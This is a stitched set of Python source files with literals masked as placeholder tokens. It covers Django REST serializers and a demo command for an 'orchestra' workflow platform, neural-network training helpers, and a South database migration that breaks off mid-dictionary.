<s> from orchestra . models import Iteration <EOL> from orchestra . models import Project <EOL> from orchestra . models import Task <EOL> from orchestra . models import TaskAssignment <EOL> from orchestra . models import TaskTimer <EOL> from orchestra . models import TimeEntry <EOL> from orchestra . models import WorkerCertification <EOL> from rest_framework import serializers <EOL> class ProjectSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = Project <EOL> fields = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> workflow_slug = serializers . SerializerMethodField ( ) <EOL> def get_workflow_slug ( self , obj ) : <EOL> return obj . workflow_version . workflow . slug <EOL> workflow_version_slug = serializers . SlugRelatedField ( <EOL> source = '<STR_LIT>' , slug_field = '<STR_LIT>' , read_only = True ) <EOL> task_class = serializers . ChoiceField ( <EOL> choices = WorkerCertification . TASK_CLASS_CHOICES ) <EOL> project_data = serializers . SerializerMethodField ( ) <EOL> def get_project_data ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . project_data <EOL> class TaskSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = Task <EOL> fields = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> step_slug = serializers . SlugRelatedField ( source = '<STR_LIT>' , <EOL> slug_field = '<STR_LIT>' , <EOL> read_only = True ) <EOL> status = serializers . SerializerMethodField ( ) <EOL> latest_data = serializers . SerializerMethodField ( ) <EOL> assignments = serializers . SerializerMethodField ( ) <EOL> def get_status ( self , obj ) : <EOL> return dict ( Task . STATUS_CHOICES ) . get ( obj . 
status , None ) <EOL> def get_latest_data ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> active_assignment = ( obj . assignments <EOL> . filter ( status = TaskAssignment . Status . PROCESSING ) ) <EOL> if active_assignment . exists ( ) : <EOL> assignment = active_assignment [ <NUM_LIT:0> ] <EOL> else : <EOL> assignment = ( obj . assignments . all ( ) <EOL> . order_by ( '<STR_LIT>' ) . first ( ) ) <EOL> if not assignment : <EOL> return None <EOL> latest_data = assignment . in_progress_task_data <EOL> return latest_data <EOL> def get_assignments ( self , obj ) : <EOL> assignments = TaskAssignmentSerializer ( obj . assignments . all ( ) <EOL> . order_by ( '<STR_LIT>' ) , <EOL> many = True ) <EOL> return assignments . data <EOL> class TaskAssignmentSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = TaskAssignment <EOL> fields = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> worker = serializers . SerializerMethodField ( ) <EOL> status = serializers . SerializerMethodField ( ) <EOL> in_progress_task_data = serializers . SerializerMethodField ( ) <EOL> iterations = serializers . SerializerMethodField ( ) <EOL> def get_worker ( self , obj ) : <EOL> if not obj . worker : <EOL> return { <EOL> '<STR_LIT:id>' : None , <EOL> '<STR_LIT:username>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> return { <EOL> '<STR_LIT:id>' : obj . worker . id , <EOL> '<STR_LIT:username>' : obj . worker . user . username , <EOL> '<STR_LIT>' : obj . worker . user . first_name , <EOL> '<STR_LIT>' : obj . worker . user . last_name , <EOL> } <EOL> def get_status ( self , obj ) : <EOL> return dict ( TaskAssignment . STATUS_CHOICES ) . get ( obj . status , None ) <EOL> def get_iterations ( self , obj ) : <EOL> iterations = IterationSerializer ( <EOL> obj . iterations . 
order_by ( '<STR_LIT>' ) , many = True ) <EOL> return iterations . data <EOL> def get_in_progress_task_data ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . in_progress_task_data <EOL> class TimeEntrySerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = TimeEntry <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT:date>' , '<STR_LIT>' , '<STR_LIT:description>' , '<STR_LIT>' ) <EOL> read_only_fields = ( '<STR_LIT:id>' , ) <EOL> class TaskTimerSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = TaskTimer <EOL> class IterationSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = Iteration <EOL> fields = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> status = serializers . SerializerMethodField ( ) <EOL> submitted_data = serializers . SerializerMethodField ( ) <EOL> def get_status ( self , obj ) : <EOL> return dict ( Iteration . STATUS_CHOICES ) . get ( obj . status , None ) <EOL> def get_submitted_data ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . submitted_data </s>
def machine_function(project_data, prerequisites):
    """<STR_LIT>"""
    # Fixed machine-step output; inputs are accepted but not consulted.
    result = {'<STR_LIT:version>': '<STR_LIT>'}
    return result
<s> from pprint import pprint <EOL> import subprocess <EOL> from time import sleep <EOL> from django . core . management . base import BaseCommand <EOL> from orchestra . orchestra_api import create_orchestra_project <EOL> from orchestra . orchestra_api import get_project_information <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def add_arguments ( self , parser ) : <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> def handle ( self , * args , ** options ) : <EOL> self . fast_mode = not options [ '<STR_LIT>' ] <EOL> continue_demo = self . intro ( ) <EOL> if not continue_demo : <EOL> return <EOL> self . describe_workflow ( ) <EOL> project_id = self . create_project ( ) <EOL> self . project_info_1 ( project_id ) <EOL> self . rating_task ( ) <EOL> self . project_info_2 ( project_id ) <EOL> self . conclusion ( ) <EOL> def pause ( self , n_seconds ) : <EOL> if not self . fast_mode : <EOL> sleep ( n_seconds ) <EOL> def intro ( self ) : <EOL> subprocess . call ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> ack = input ( '<STR_LIT>' ) . lower ( ) <EOL> while ack not in [ '<STR_LIT:y>' , '<STR_LIT:n>' ] : <EOL> ack = input ( '<STR_LIT>' ) . lower ( ) <EOL> if ack == '<STR_LIT:n>' : <EOL> print ( '<STR_LIT>' ) <EOL> return False <EOL> print ( '<STR_LIT>' ) <EOL> return True <EOL> def describe_workflow ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . 
pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> def create_project ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '''<STR_LIT>''' ) <EOL> self . pause ( <NUM_LIT:4> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> input ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> project_id = create_orchestra_project ( <EOL> None , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> <NUM_LIT:10> , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:train>' , <EOL> ) <EOL> print ( '<STR_LIT>' . format ( project_id ) ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> return project_id <EOL> def project_info_1 ( self , project_id ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> input ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> project_info = get_project_information ( project_id ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> pprint ( project_info ) <EOL> self . pause ( <NUM_LIT:4> ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:4> ) <EOL> def rating_task ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . 
pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> input ( '<STR_LIT>' ) <EOL> def get_rating_info ( self , msg , project_id ) : <EOL> input ( msg ) <EOL> project_info = get_project_information ( project_id ) <EOL> complete = project_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] == '<STR_LIT>' <EOL> rating = ( project_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) <EOL> if complete else None ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) <EOL> pprint ( project_info ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:4> ) <EOL> return complete , rating <EOL> def project_info_2 ( self , project_id ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> complete , rating = self . get_rating_info ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , project_id ) <EOL> while not complete : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> complete , rating = self . get_rating_info ( <EOL> '<STR_LIT>' , project_id ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> if not rating : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( rating ) ) <EOL> self . 
pause ( <NUM_LIT:4> ) <EOL> def conclusion ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) </s>
import glob
import time
import os
import numpy as np
import hickle as hkl

from proc_load import crop_and_mirror


def proc_configs(config):
    # Make sure the output directory exists before training starts.
    if not os.path.exists(config['<STR_LIT>']):
        os.makedirs(config['<STR_LIT>'])
        print "<STR_LIT>" + config['<STR_LIT>']
    return config


def unpack_configs(config, ext_data='<STR_LIT>', ext_label='<STR_LIT>'):
    # Resolve the data/label file lists and the image mean from the config.
    flag_para_load = config['<STR_LIT>']
    train_folder = config['<STR_LIT>']
    val_folder = config['<STR_LIT>']
    label_folder = config['<STR_LIT>']
    train_filenames = sorted(glob.glob(train_folder + '<STR_LIT>' + ext_data))
    val_filenames = sorted(glob.glob(val_folder + '<STR_LIT>' + ext_data))
    train_labels = np.load(label_folder + '<STR_LIT>' + ext_label)
    val_labels = np.load(label_folder + '<STR_LIT>' + ext_label)
    img_mean = np.load(config['<STR_LIT>'])
    # Add a trailing broadcast axis so the mean subtracts over a whole batch.
    # assumes img_mean is 3-D before the newaxis -- TODO confirm against writer
    img_mean = img_mean[:, :, :, np.newaxis].astype('<STR_LIT>')
    return (flag_para_load,
            train_filenames, val_filenames, train_labels, val_labels, img_mean)


def adjust_learning_rate(config, epoch, step_idx, val_record, learning_rate):
    """Adapt the shared learning-rate variable; return the (possibly advanced) step index."""
    # 'step'-style policy: divide the lr by 10 at each scheduled epoch.
    if config['<STR_LIT>'] == '<STR_LIT>':
        if epoch == config['<STR_LIT>'][step_idx]:
            learning_rate.set_value(
                np.float32(learning_rate.get_value() / <NUM_LIT:10>))
            step_idx += <NUM_LIT:1>
            if step_idx >= len(config['<STR_LIT>']):
                # Wrap to avoid indexing past the schedule.
                step_idx = <NUM_LIT:0>
            print '<STR_LIT>', learning_rate.get_value()
    # Auto policy: decay when recent validation progress stalls.
    if config['<STR_LIT>'] == '<STR_LIT>':
        if (epoch > <NUM_LIT:5>) and (val_record[-<NUM_LIT:3>] - val_record[-<NUM_LIT:1>] <
                config['<STR_LIT>']):
            learning_rate.set_value(
                np.float32(learning_rate.get_value() / <NUM_LIT:10>))
            print '<STR_LIT>', learning_rate.get_value()
    return step_idx


def get_val_error_loss(rand_arr, shared_x, shared_y,
                       val_filenames, val_labels,
                       flag_para_load, img_mean,
                       batch_size, validate_model,
                       send_queue=None, recv_queue=None,
                       flag_top_5=False):
    """Evaluate the model on every validation batch.

    With `flag_para_load` the next batch's filename is queued to the loader
    process while the current batch evaluates.  NOTE(review): the
    send/recv message order is a fixed handshake -- do not reorder.
    """
    validation_losses = []
    validation_errors = []
    if flag_top_5:
        validation_errors_top_5 = []
    n_val_batches = len(val_filenames)
    if flag_para_load:
        # Prime the loader with the first file and a fixed (deterministic)
        # crop parameter for validation.
        send_queue.put(str(val_filenames[<NUM_LIT:0>]))
        send_queue.put(np.float32([<NUM_LIT:0.5>, <NUM_LIT:0.5>, <NUM_LIT:0>]))
        send_queue.put('<STR_LIT>')
    for val_index in range(n_val_batches):
        if flag_para_load:
            msg = recv_queue.get()
            assert msg == '<STR_LIT>'
            if val_index + <NUM_LIT:1> < n_val_batches:
                # Queue the next file while this one is consumed.
                name_to_read = str(val_filenames[val_index + <NUM_LIT:1>])
                send_queue.put(name_to_read)
                send_queue.put(np.float32([<NUM_LIT:0.5>, <NUM_LIT:0.5>, <NUM_LIT:0>]))
        else:
            # Serial path: load, mean-subtract, crop, and upload the batch.
            val_img = hkl.load(str(val_filenames[val_index])) - img_mean
            param_rand = [<NUM_LIT:0.5>, <NUM_LIT:0.5>, <NUM_LIT:0>]
            val_img = crop_and_mirror(val_img, param_rand, flag_batch=True)
            shared_x.set_value(val_img)
        shared_y.set_value(val_labels[val_index * batch_size:
                                      (val_index + <NUM_LIT:1>) * batch_size])
        if flag_top_5:
            loss, error, error_top_5 = validate_model()
        else:
            loss, error = validate_model()
        if flag_para_load and (val_index + <NUM_LIT:1> < n_val_batches):
            send_queue.put('<STR_LIT>')
        validation_losses.append(loss)
        validation_errors.append(error)
        if flag_top_5:
            validation_errors_top_5.append(error_top_5)
    this_validation_loss = np.mean(validation_losses)
    this_validation_error = np.mean(validation_errors)
    if flag_top_5:
        this_validation_error_top_5 = np.mean(validation_errors_top_5)
        return this_validation_error, this_validation_error_top_5, this_validation_loss
    else:
        return this_validation_error, this_validation_loss


def get_rand3d():
    # Three uniform floats; the last is rounded to {0, 1} -- presumably the
    # mirror flag used by crop_and_mirror; verify against proc_load.
    tmp_rand = np.float32(np.random.rand(<NUM_LIT:3>))
    tmp_rand[<NUM_LIT:2>] = round(tmp_rand[<NUM_LIT:2>])
    return tmp_rand


def train_model_wrap(train_model, shared_x, shared_y, rand_arr, img_mean,
                     count, minibatch_index, minibatch_range, batch_size,
                     train_filenames, train_labels,
                     flag_para_load,
                     flag_batch,
                     send_queue=None, recv_queue=None):
    """Run one training step; mirrors get_val_error_loss's loader handshake."""
    if flag_para_load:
        # Wait until the loader has filled shared_x for this step.
        msg = recv_queue.get()
        assert msg == '<STR_LIT>'
        if count < len(minibatch_range):
            # Queue the next minibatch with fresh random crop parameters.
            ind_to_read = minibatch_range[count]
            name_to_read = str(train_filenames[ind_to_read])
            send_queue.put(name_to_read)
            send_queue.put(get_rand3d())
    else:
        # Serial path: load, mean-subtract, randomly crop/mirror, upload.
        batch_img = hkl.load(str(train_filenames[minibatch_index])) - img_mean
        param_rand = get_rand3d()
        batch_img = crop_and_mirror(batch_img, param_rand, flag_batch=flag_batch)
        shared_x.set_value(batch_img)
    batch_label = train_labels[minibatch_index * batch_size:
                               (minibatch_index + <NUM_LIT:1>) * batch_size]
    shared_y.set_value(batch_label)
    cost_ij = train_model()
    return cost_ij
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    """South schema migration: adds an M2M join table with a unique pair constraint.

    The `models` attribute below is South's frozen-ORM snapshot of the app's
    models at the time this migration was generated; it is data, not live
    model definitions, and must not be edited by hand.
    """

    def forwards(self, orm):
        # Create the join table (id + two FKs) and enforce pair uniqueness.
        db.create_table('<STR_LIT>', (
            ('<STR_LIT:id>', models.AutoField(verbose_name='<STR_LIT>', primary_key=True, auto_created=True)),
            ('<STR_LIT>', models.ForeignKey(orm['<STR_LIT>'], null=False)),
            ('<STR_LIT>', models.ForeignKey(orm['<STR_LIT>'], null=False))
        ))
        db.create_unique('<STR_LIT>', ['<STR_LIT>', '<STR_LIT>'])

    def backwards(self, orm):
        # Dropping the table also drops its unique constraint.
        db.delete_table('<STR_LIT>')

    models = {
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT:user>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': "<STR_LIT>", '<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT:user>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:to>': "<STR_LIT>"})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>'}),
            '<STR_LIT:email>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:password>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:username>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:max_length>': '<STR_LIT>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>', '<STR_LIT>': "<STR_LIT>"},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT:title>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT:value>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:1>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT:port>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT:description>': ('<STR_LIT>', [], {'<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:port>': ('<STR_LIT>', [], {'<STR_LIT:blank>': '<STR_LIT:True>', '<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:null>': '<STR_LIT:True>'}),
